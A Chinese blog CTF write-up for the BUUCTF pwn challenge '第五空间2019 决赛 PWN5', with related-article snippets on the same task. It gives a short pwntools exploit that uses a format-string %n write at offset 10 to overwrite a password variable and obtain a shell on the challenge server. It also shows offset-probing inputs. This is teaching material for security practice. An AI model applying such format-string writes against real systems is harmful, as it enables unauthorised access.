[BUUCTF-pwn]——[第五空间2019 决赛]PWN5

最新推荐文章于 2024-09-27 19:50:51 发布

Y-peak

最新推荐文章于 2024-09-27 19:50:51 发布

阅读量380

点赞数

分类专栏： # BUUCTF # 格式化字符串

本文链接：https://blog.csdn.net/Y_peak/article/details/113920898

版权

BUUCTF 同时被 2 个专栏收录

89 篇文章 8 订阅

订阅专栏

格式化字符串

11 篇文章 1 订阅

订阅专栏

[BUUCTF-pwn]——[第五空间2019 决赛]PWN5

题目地址：https://buuoj.cn/challenges#[第五空间2019%20决赛]PWN5
题目：

这是一道格式化字符串的题，给大家讲解下

checksec一下看看，开启了canary保护，基本开启这个保护都会用到格式化字符串的漏洞。
在这里插入图片描述
在IDA中

利用pwndbg看看, 偏移是多少。 0xa也就是 10

思路

利用格式化字符串漏洞, 修改unk_804C044的值, 并且输入相等的值

exploit

from pwn import *
p=remote('node3.buuoj.cn',26506)

unk_804C044_addr=0x0804C044

payload=p32(unk_804C044_addr)+'%10$n'
p.sendline(payload)

p.sendline('4')
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF-Pwn-[第五空间2019 决赛]PWN5

餐桌上的猫

02-15

399

题目截图检查文件信息这是一个32位的程序，开启了NX和Canary 用IDA打开查看找到来能getshell的代码反汇编查看主函数功能，程序将我们输入的passwd与存放在804c044地址的数进行比较，正确就可以getshell了，红框中存在格式化字符串漏洞，我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置，是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=

buuctf——[第五空间2019 决赛]PWN5 1

qq_41560595的博客

03-17

4606

查看文件权限设置了canary，无法栈溢出。 F5查看源程序源程序大意是把随机数放入到bss段的0x804c044处，用户输入用户名和密码，如果密码和随机数相等，则拿到权限。解题思路看到了printf，又加了canary权限，可以想到考查格式化字符串漏洞。可以更改0x804c044处的值，所以要精心构造一个合适的格式化字符串。构造的方法很多。在用户输入用户名处，先输入一个AAAA，试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造： bss=0x804c044 payload=b

2 条评论您还未登录，请先登录后发表或查看评论

[第五空间2019 决赛]PWN5

weixin_56301399的博客

07-21

1688

格式化字符串漏洞

buuctf pwn [第五空间2019 决赛]PWN51

最新发布

m0_74125780的博客

09-27

356

然后将其放入ida32，查看main函数，幸运的发现有system。然后接下来就是理解这段反编译代码在讲什么，它的意思是它会随机生成一个4字节大小的数据，然后我们输入的passwd要与其相等。但是我们并不知道它随机生成的是什么，所以我们可以进行替换，将它随机生成的数替换成我们要输入的数。32位测输入点偏移，找到0x62626262(bbbb)，数一下刚好是第10位。首先我们可以知道的是，随机生成的数据的开始地址0x804c044。首先用checksec检查一下，发现是32位的，还有栈保护。

buuctf [第五空间2019 决赛]PWN5

carol2358的博客

04-11

722

一道格式化字符串的题先输入AAAA %08x %08x %08x %08x %08x %08x %08x········来确定输入首地址的偏移(找到41414141就是AAAA) 之后只要修改随机数的值，让输入和随机数的值一样就可以了 exp如下： from pwn import * context(log_level = 'debug',arch ='i386',os = 'linux' )...

BUUCTF Pwn [第五空间2019 决赛]PWN5

MrTreebook的博客

12-25

1012

BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析查看主函数，函数的功能是读入一个4位的随机密码，再将我们输入的密码与随机生成数比较，相同就执行system 这里面的printf（）存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入

BUUCTF [第五空间2019 决赛]PWN5

红叶的博客

10-31

1577

输入探测格式化字符串的payload，AAAA-%x-%x-%x-%x-%x，A的ASCII码值为65（0x41），因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1，而非随机数。因为我们已经知道偏移量了，可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值，然后再次输入此值即可获取shell。或者还有一个，AAAA-%p-%p-%p-%p-%p-%p，32位64位通用。

BUUCTF-PWN-[ZJCTF 2019]Login

07-10

BUUCTF-PWN-[ZJCTF 2019]Login

buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏

2301_81505831的博客

03-15

471

首先，我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量：可以数出0x41414141是格式化字符串的第10个参数，之后只要修改dword_804c044的值，让输入和dword_804c044的值一样就可以了。打开靶机，下载文件，检查文件类型，可以看到是32位程序，开启了Canary保护，不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后，附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。

Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp

m0sway的博客

03-04

433

Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp

【BUU】[第五空间2019 决赛]PWN5

bzduanlei的博客

07-31

467

一、前置知识 1、%n,不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数？运行程序后，在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。可以看到，AAAA对应的数值0x41414141在格式化字符串的第10个参数。二、解题思路 0x01 分析文件 0x02 拖入IDA 3

[buuctf][第五空间2019 决赛]PWN5

逆向萌新的博客

06-19

432

[buuctf][第五空间2019 决赛]PWN5

BUUCTF-PWN-[第五空间2019 决赛]PWN5

m0_64180167的博客

04-17

492

这题考到格式化字符串的方法我之前没有学过根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计发现输入名字他会返回名字然后再输入密码如果密码和unk_804c044一样输出shellcode我们看看这个函数是什么搜索一下发现是随机数这样我们就无法通过判断得到shellcode我们现在又两个方法。

【pwn】[第五空间2019 决赛]PWN5

ethan18的博客

07-13

289

函数的逻辑（就是上面那个伪代码），可以看出，主要是需要让我们的passwd输入值和从文件中输入的值保持相同，但是很明显我们根本就不知道这个。可以数出，0x41414141是格式化字符串的第10个参数，所以我们构造的时候就需要从。这是Buuctf的一道题，是我实战遇到的第一道格式字符串漏洞，在此记录。对于格式化字符串漏洞，我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址，表明是有格式字符串漏洞的。，我们一个字节一个字节的存入，所以不能是直接用。，将输出的字符串的数量覆盖进所指向的位置。

[BUUCTF]PWN——[第五空间2019 决赛]PWN5

BangSen1的博客

03-25

4918

[第五空间2019 决赛]PWN5 例行检查，32位，开启了canary保护和NX保护。运行一下。 IDA打开，看到了/bin/sh,但开启了保护查看主函数，函数的功能是读入一个4位的随机密码，再将我们输入的密码与随机生成数比较，相同就执行system 这里面的printf（）存在格式化字符串漏洞按我的理解就是输入的参数的个数是不固定的，是由前面的格式化字符串决定的，所以我们只要控制了前面的格式化字符串，再结合一些参数，后面输出什么就是由我们决定的；如： %d 用于读取10进制数值 %x

PWN——[第五空间2019 决赛]PWN5

有头发的埼玉

11-14

504

完全通过静态分析得到题解，与网传算法不同

buuctf pwn 第五空间决赛pwn5

09-28

buuctf pwn 第五空间决赛pwn5是一个CTF pwn题，它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞，利用这个漏洞可以读取或修改程序的内存中的数据，从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中，攻击者可以通过构造特定的输入来修改程序中的变量，进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。